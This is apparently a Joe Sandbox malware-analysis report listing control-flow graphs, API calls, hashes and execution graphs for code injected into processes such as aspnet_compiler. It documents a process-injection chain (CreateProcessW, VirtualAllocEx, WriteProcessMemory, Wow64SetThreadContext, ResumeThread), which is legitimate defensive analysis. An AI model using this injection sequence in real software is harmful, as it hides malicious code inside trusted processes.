                                                                control_flow_graph 237 7fe8b655c58-7fe8b6587df 240 7fe8b6587e1-7fe8b6587f8 237->240 241 7fe8b6587fb-7fe8b65880b 237->241 240->241 242 7fe8b65880d-7fe8b658824 241->242 243 7fe8b658827-7fe8b65887a 241->243 242->243 244 7fe8b6588a2-7fe8b6589ce CreateProcessW 243->244 245 7fe8b65887c-7fe8b65889c 243->245 249 7fe8b6589d0 244->249 250 7fe8b6589d6-7fe8b658ac4 call 7fe8b658ac5 244->250 245->244 249->250
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 9023fa123e5c713f9a0f358f359c1fccbc069d966515e1f65ee4bba9ac73c2aa
                                                                • Instruction ID: 5452854ea4798e295724f34749d398dda845ed4be97cfa12cd82b7945008d56b
                                                                • Opcode Fuzzy Hash: 9023fa123e5c713f9a0f358f359c1fccbc069d966515e1f65ee4bba9ac73c2aa
                                                                • Instruction Fuzzy Hash: 49C1F670908A1D8FDB98EF58C894BE9B7F1FB69301F1011AE944EE3691DB75A980CF44
                                                                Function 000007FE8B6590AD Relevance: 1.8, APIs: 1, Instructions: 258injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 261 7fe8b6590ad-7fe8b6590b9 262 7fe8b6590c4-7fe8b6590ca 261->262 263 7fe8b6590bb-7fe8b6590c3 261->263 264 7fe8b6590cc-7fe8b659171 262->264 265 7fe8b659057 262->265 263->262 271 7fe8b659173-7fe8b659196 264->271 272 7fe8b659199-7fe8b659232 WriteProcessMemory 264->272 267 7fe8b65905f-7fe8b6590ab 265->267 268 7fe8b659059 265->268 268->267 271->272 273 7fe8b659234 272->273 274 7fe8b65923a-7fe8b659296 272->274 273->274
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 90114cb1e3a636a3a61e7b50fa069bbce92148ce03cab83fcc0c22e0ec0077a5
                                                                • Instruction ID: 5e475f9fceaa82e7ea02a34486d4b46bda4df29fcf0f35687becbdfc650b647b
                                                                • Opcode Fuzzy Hash: 90114cb1e3a636a3a61e7b50fa069bbce92148ce03cab83fcc0c22e0ec0077a5
                                                                • Instruction Fuzzy Hash: 2E811270908A1D8FDB98DF98D885BE9BBB1FB5A310F1041AED049E3292D674A985CF44
                                                                Function 000007FE8B658D55 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 277 7fe8b658d55-7fe8b658d61 278 7fe8b658d63-7fe8b658d6b 277->278 279 7fe8b658d6c-7fe8b658d7a 277->279 278->279 280 7fe8b658d7c-7fe8b658ead ReadProcessMemory 279->280 281 7fe8b658d07-7fe8b658d51 279->281 285 7fe8b658eb5-7fe8b658f0b 280->285 286 7fe8b658eaf 280->286 286->285
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: a375dcd493b112d84f3cf19ab55c4b8ab9a4346d0f481b556c5144b853ce19d0
                                                                • Instruction ID: 6d6565d42f1a0a8e1193f5a448c9846ab221f917cc463a454fa156cd35fb6090
                                                                • Opcode Fuzzy Hash: a375dcd493b112d84f3cf19ab55c4b8ab9a4346d0f481b556c5144b853ce19d0
                                                                • Instruction Fuzzy Hash: 7671247090865C8FDB98DF98D885BE9BBF1FB69310F1081AAD04DE7252DB34A995CF40
                                                                Function 000007FE8B658F0D Relevance: 1.7, APIs: 1, Instructions: 233memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 288 7fe8b658f0d-7fe8b658f19 289 7fe8b658f24-7fe8b658f2a 288->289 290 7fe8b658f1b-7fe8b658f23 288->290 291 7fe8b658f2c-7fe8b658f69 289->291 292 7fe8b658eb7-7fe8b658f0b 289->292 290->289 295 7fe8b658f70-7fe8b659050 VirtualAllocEx 291->295 296 7fe8b659057 295->296 297 7fe8b65905f-7fe8b6590ab 296->297 298 7fe8b659059 296->298 298->297
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: edab7838ddcfccc5f68d913873529906da4547e83b3ca7fdec75cda31489bcba
                                                                • Instruction ID: fd4c0118ba50061e8b640d40d0c39abcc8e3a0114eb496419f20dc44ecf4124c
                                                                • Opcode Fuzzy Hash: edab7838ddcfccc5f68d913873529906da4547e83b3ca7fdec75cda31489bcba
                                                                • Instruction Fuzzy Hash: 8C61467090860C8FDB98DF58C881BE9BBF0FB6A310F1091AED04DE3252DA34A995CF44
                                                                Function 000007FE8B655CB8 Relevance: 1.7, APIs: 1, Instructions: 204injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 300 7fe8b655cb8-7fe8b659171 303 7fe8b659173-7fe8b659196 300->303 304 7fe8b659199-7fe8b659232 WriteProcessMemory 300->304 303->304 305 7fe8b659234 304->305 306 7fe8b65923a-7fe8b659296 304->306 305->306
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 81c270ce195a5727591b99a4ea535b34c4c30ac4a6853cf1fee73df16e2a1d88
                                                                • Instruction ID: 027bb4310f5bcdad93596c7872f1700898ea38c3bc60cbccc2f958d91c1bd266
                                                                • Opcode Fuzzy Hash: 81c270ce195a5727591b99a4ea535b34c4c30ac4a6853cf1fee73df16e2a1d88
                                                                • Instruction Fuzzy Hash: BF51E370908A1C8FDB98DF98C884BE9BBF1FB69315F1051AED04EE3251DB74A985CB44
                                                                Function 000007FE8B655CA8 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 309 7fe8b655ca8-7fe8b658ead ReadProcessMemory 312 7fe8b658eb5-7fe8b658f0b 309->312 313 7fe8b658eaf 309->313 313->312
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 62074561de3ce7c5b8a536b6b5deca1e079429dd811e971d4ac73eb5e85dca98
                                                                • Instruction ID: 74232f9ca52d7ff9a4a927c638d2bf84bdbbaaac61a74c24feb306d4c28f9bab
                                                                • Opcode Fuzzy Hash: 62074561de3ce7c5b8a536b6b5deca1e079429dd811e971d4ac73eb5e85dca98
                                                                • Instruction Fuzzy Hash: 0C510070908A1C8FDB98DF58C884BE9BBF1FB69310F1091AED04DE3251DA70A985CF44
                                                                Function 000007FE8B659299 Relevance: 1.7, APIs: 1, Instructions: 180threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 315 7fe8b659299-7fe8b6592a5 316 7fe8b6592b0-7fe8b6592ba 315->316 317 7fe8b6592a7-7fe8b6592af 315->317 318 7fe8b6592bc-7fe8b65937a ResumeThread 316->318 319 7fe8b659247-7fe8b659296 316->319 317->316 323 7fe8b659382-7fe8b6593c0 318->323 324 7fe8b65937c 318->324 324->323
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 15bc0ca4fe2fd45c842375e2d690383aca97391f449cfef1e67877694f2b23a8
                                                                • Instruction ID: d5343d7342151a164c0c41f7b2640d5918ae7a75077d0e16c49d539b4c194ec0
                                                                • Opcode Fuzzy Hash: 15bc0ca4fe2fd45c842375e2d690383aca97391f449cfef1e67877694f2b23a8
                                                                • Instruction Fuzzy Hash: 8F515A7090864C8FDB58DFA8D885BE9BBF0FB5A320F10419ED049E7292D630A896CF41
                                                                Function 000007FE8B655CD8 Relevance: 1.7, APIs: 1, Instructions: 178memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 326 7fe8b655cd8-7fe8b659050 VirtualAllocEx 329 7fe8b659057 326->329 330 7fe8b65905f-7fe8b6590ab 329->330 331 7fe8b659059 329->331 331->330
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: d3363e15285b9fc5d7a8975ee6f94afe3128dd27d8b90d7625fcc27d6564ec1b
                                                                • Instruction ID: 65839bee3264063e200a1ca243e54c2952b5b62838bf01cd1074a729914ef059
                                                                • Opcode Fuzzy Hash: d3363e15285b9fc5d7a8975ee6f94afe3128dd27d8b90d7625fcc27d6564ec1b
                                                                • Instruction Fuzzy Hash: E251D470908A1C8FDB98DF58C845BE9BBF1FB69310F1091AED44EE3251DA70A985CF44
                                                                Function 000007FE8B655C78 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 333 7fe8b655c78-7fe8b658c74 336 7fe8b658c96-7fe8b658cff Wow64SetThreadContext 333->336 337 7fe8b658c76-7fe8b658c93 333->337 338 7fe8b658d01 336->338 339 7fe8b658d07-7fe8b658d51 336->339 337->336 338->339
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 4f9b66a0f5f687dce21de64e7511955929158e66dc7fc0704da0322e37f79a2d
                                                                • Instruction ID: 8c4aecef6dff20f4caa351d3a2d854e8db82d1e281d142538e92c9190871ed56
                                                                • Opcode Fuzzy Hash: 4f9b66a0f5f687dce21de64e7511955929158e66dc7fc0704da0322e37f79a2d
                                                                • Instruction Fuzzy Hash: 29513B70D08A0D8FEB94DF99C484BEABBF1FBA9311F10826AD049E7255D7749885CF80
                                                                Function 000007FE8B655CE8 Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 341 7fe8b655ce8-7fe8b65937a ResumeThread 344 7fe8b659382-7fe8b6593c0 341->344 345 7fe8b65937c 341->345 345->344
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535786698.000007FE8B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B650000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b650000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 986e930f2f8680f371385810ec1c437ad799d55e232cae399c0cdd55a7f49d54
                                                                • Instruction ID: ea2d24371e64d3f6fb07afe7edda9fd7746fff8cfc0f72611dad33c100c0c741
                                                                • Opcode Fuzzy Hash: 986e930f2f8680f371385810ec1c437ad799d55e232cae399c0cdd55a7f49d54
                                                                • Instruction Fuzzy Hash: 34411870D08A0C8FDB58DF98D885BADBBF1FB5A310F10416ED049E7251DA70A846CF41
                                                                Function 000007FE8B6E1021 Relevance: .1, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 79439bd4647221e4f29546b1d69336b62ed7ac1123ba6357132558a254c27d40
                                                                • Instruction ID: b2de55b3723356eed535ef02a9ba5cfc48b0bd9a266ccaeda6e82ac8e2ce324a
                                                                • Opcode Fuzzy Hash: 79439bd4647221e4f29546b1d69336b62ed7ac1123ba6357132558a254c27d40
                                                                • Instruction Fuzzy Hash: BC218C3181D3C88FDB439F6488546D93FB0AF17200F1A01D7D484CB1B3D6289A59C792
                                                                Function 000007FE8B6E07E5 Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7bf3239e20f3198890c73207a3871a05dc6956c30aaf8a26a922e0597857c903
                                                                • Instruction ID: 30ae57154b0f742a75c575cfebf2ce0b45a2c7645f7ddfca4a0a6092020302eb
                                                                • Opcode Fuzzy Hash: 7bf3239e20f3198890c73207a3871a05dc6956c30aaf8a26a922e0597857c903
                                                                • Instruction Fuzzy Hash: DF212C7151D7C88FCB43DF6888556D97FF0BF16214F0A01DBE888DB2A3D6249A54C792
                                                                Function 000007FE8B6E03ED Relevance: .1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db5d2a96094b86fab4f42f0b8a49c4aa76968736f9103284fca0967859bdc7ab
                                                                • Instruction ID: 69b20fc2fa431a78deac61e1b9f76d797c38fe0232c919e0bca9e63c7cd1ec8d
                                                                • Opcode Fuzzy Hash: db5d2a96094b86fab4f42f0b8a49c4aa76968736f9103284fca0967859bdc7ab
                                                                • Instruction Fuzzy Hash: B9112B3140D3C89FC743CF6488656E53FF0AF56204F1A01E7D484CB2A3D238AA19DBA1
                                                                Function 000007FE8B6E0A81 Relevance: .1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 898bca66455caccc893baf7ddef9ab32a82f2c0dc91943c76150e517bafd2520
                                                                • Instruction ID: 8caba2b26d46f2d9322716d1d56fdae33a5d407c5d5821c04e368acd1be6db65
                                                                • Opcode Fuzzy Hash: 898bca66455caccc893baf7ddef9ab32a82f2c0dc91943c76150e517bafd2520
                                                                • Instruction Fuzzy Hash: 6C11283040D7C89FCB43DB7888686957FB1AF57214F0A05EBD484CB1A3D6689959CB22
                                                                Function 000007FE8B6E1215 Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d88757bc7cf9c091d062202daa81ae8a58e373637e429dac64912ecf4313de4
                                                                • Instruction ID: bc02deb43e290de70b8e38415dde505b9ac195c408b49aa2a68732aa2af7c096
                                                                • Opcode Fuzzy Hash: 1d88757bc7cf9c091d062202daa81ae8a58e373637e429dac64912ecf4313de4
                                                                • Instruction Fuzzy Hash: 2A21477040D7C98FD743DF3888546997FB1AF17204F1A01E7D488CB1A3D3689598C752
                                                                Function 000007FE8B6E0741 Relevance: .1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aadc826313ebfd1aa896ab122eb3e2467d69b015f336bf067f1d8f4139f78396
                                                                • Instruction ID: 7eb7ed52317be047ec7413e2fe914e91a68887855b14417fa4442eaca9834744
                                                                • Opcode Fuzzy Hash: aadc826313ebfd1aa896ab122eb3e2467d69b015f336bf067f1d8f4139f78396
                                                                • Instruction Fuzzy Hash: A011043185E7C85FD7039B7498287E57FB1AF13214F0A01E7D488CB1B3D6284A98C762
                                                                Function 000007FE8B6E110B Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.535835266.000007FE8B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7fe8b6e0000_temp_exec.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6031a62c83b661c1ad97d9fc9160821ca95de4b212a75e3f0b62256ab563ab9
                                                                • Instruction ID: e35457a5f028c35db9ebac5beb10750af7c4df95dd9782fd7d870a48e75a6766
                                                                • Opcode Fuzzy Hash: e6031a62c83b661c1ad97d9fc9160821ca95de4b212a75e3f0b62256ab563ab9
                                                                • Instruction Fuzzy Hash: 8101163051C7CC9FDB82EF688858A997FF1EF16204F0904DBE488CB2A3D6349969CB51

                                                                Execution Graph

                                                                Execution Coverage:1.1%
                                                                Dynamic/Decrypted Code Coverage:4.4%
                                                                Signature Coverage:7%
                                                                Total number of Nodes:114
                                                                Total number of Limit Nodes:11
                                                                execution_graph 77383 424243 77384 42425f 77383->77384 77385 424287 77384->77385 77386 42429b 77384->77386 77387 42bda3 NtClose 77385->77387 77393 42bda3 77386->77393 77389 424290 77387->77389 77390 4242a4 77396 42def3 RtlAllocateHeap 77390->77396 77392 4242af 77394 42bdc0 77393->77394 77395 42bdce NtClose 77394->77395 77395->77390 77396->77392 77478 4245d3 77482 4245ec 77478->77482 77479 424637 77480 42ddd3 RtlFreeHeap 77479->77480 77481 424647 77480->77481 77482->77479 77483 424677 77482->77483 77485 42467c 77482->77485 77484 42ddd3 RtlFreeHeap 77483->77484 77484->77485 77486 42ef93 77487 42efa3 77486->77487 77488 42efa9 77486->77488 77491 42deb3 77488->77491 77490 42efcf 77494 42c0a3 77491->77494 77493 42dece 77493->77490 77495 42c0bd 77494->77495 77496 42c0cb RtlAllocateHeap 77495->77496 77496->77493 77497 42b413 77498 42b42d 77497->77498 77501 a5fdc0 LdrInitializeThunk 77498->77501 77499 42b452 77501->77499 77397 413583 77398 4135a3 77397->77398 77400 41360c 77398->77400 77402 41aca3 RtlFreeHeap LdrInitializeThunk 77398->77402 77401 413602 77402->77401 77403 4133a3 77406 42c013 77403->77406 77407 42c030 77406->77407 77410 a5fb68 LdrInitializeThunk 77407->77410 77408 4133c2 77410->77408 77502 41dd53 77503 41dd79 77502->77503 77507 41de70 77503->77507 77508 42f0c3 77503->77508 77505 41de11 77506 42b463 LdrInitializeThunk 77505->77506 77505->77507 77506->77507 77509 42f033 77508->77509 77510 42f090 77509->77510 77511 42deb3 RtlAllocateHeap 77509->77511 77510->77505 77512 42f06d 77511->77512 77513 42ddd3 RtlFreeHeap 77512->77513 77513->77510 77514 423d96 77515 423d9c 77514->77515 77516 423e23 77515->77516 77517 423e38 77515->77517 77518 42bda3 NtClose 77516->77518 77519 42bda3 NtClose 77517->77519 77520 423e2c 77518->77520 77521 423e41 77519->77521 77522 423e78 77521->77522 77523 42ddd3 RtlFreeHeap 77521->77523 77524 423e6c 77523->77524 77525 a5f9f0 LdrInitializeThunk 77411 401ae8 77412 401afe 77411->77412 77415 42f463 77412->77415 77413 401b72 77413->77413 77418 42d993 77415->77418 77419 42d9b9 77418->77419 77428 407263 77419->77428 77421 42d9cf 77427 42da2b 77421->77427 77431 41a993 77421->77431 77423 42d9ee 77424 42c123 ExitProcess 77423->77424 77425 42da03 77423->77425 77424->77425 77442 42c123 77425->77442 77427->77413 77445 415d33 77428->77445 77430 407270 77430->77421 77432 41a9bf 77431->77432 77467 41a883 77432->77467 77435 41aa04 77438 41aa20 77435->77438 77440 42bda3 NtClose 77435->77440 77436 41a9ec 77437 41a9f7 77436->77437 77439 42bda3 NtClose 77436->77439 77437->77423 77438->77423 77439->77437 77441 41aa16 77440->77441 77441->77423 77443 42c140 77442->77443 77444 42c14e ExitProcess 77443->77444 77444->77427 77446 415d4d 77445->77446 77448 415d63 77446->77448 77449 42c7a3 77446->77449 77448->77430 77451 42c7bd 77449->77451 77450 42c7ec 77450->77448 77451->77450 77456 42b463 77451->77456 77457 42b47d 77456->77457 77463 a5fae8 LdrInitializeThunk 77457->77463 77458 42b4a6 77460 42ddd3 77458->77460 77464 42c0e3 77460->77464 77462 42c859 77462->77448 77463->77458 77465 42c0fd 77464->77465 77466 42c10b RtlFreeHeap 77465->77466 77466->77462 77468 41a89d 77467->77468 77472 41a979 77467->77472 77473 42b4f3 77468->77473 77471 42bda3 NtClose 77471->77472 77472->77435 77472->77436 77474 42b50d 77473->77474 77477 a607ac LdrInitializeThunk 77474->77477 77475 41a96d 77475->77471 77477->77475

                                                                Executed Functions

                                                                Function 0042BDA3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 34 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                                • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                                • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                                • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4
                                                                Function 00A607AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 48 a607ac-a607c1 LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                Function 00A5F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 44 a5f9f0-a5fa05 LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                Function 00A5FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

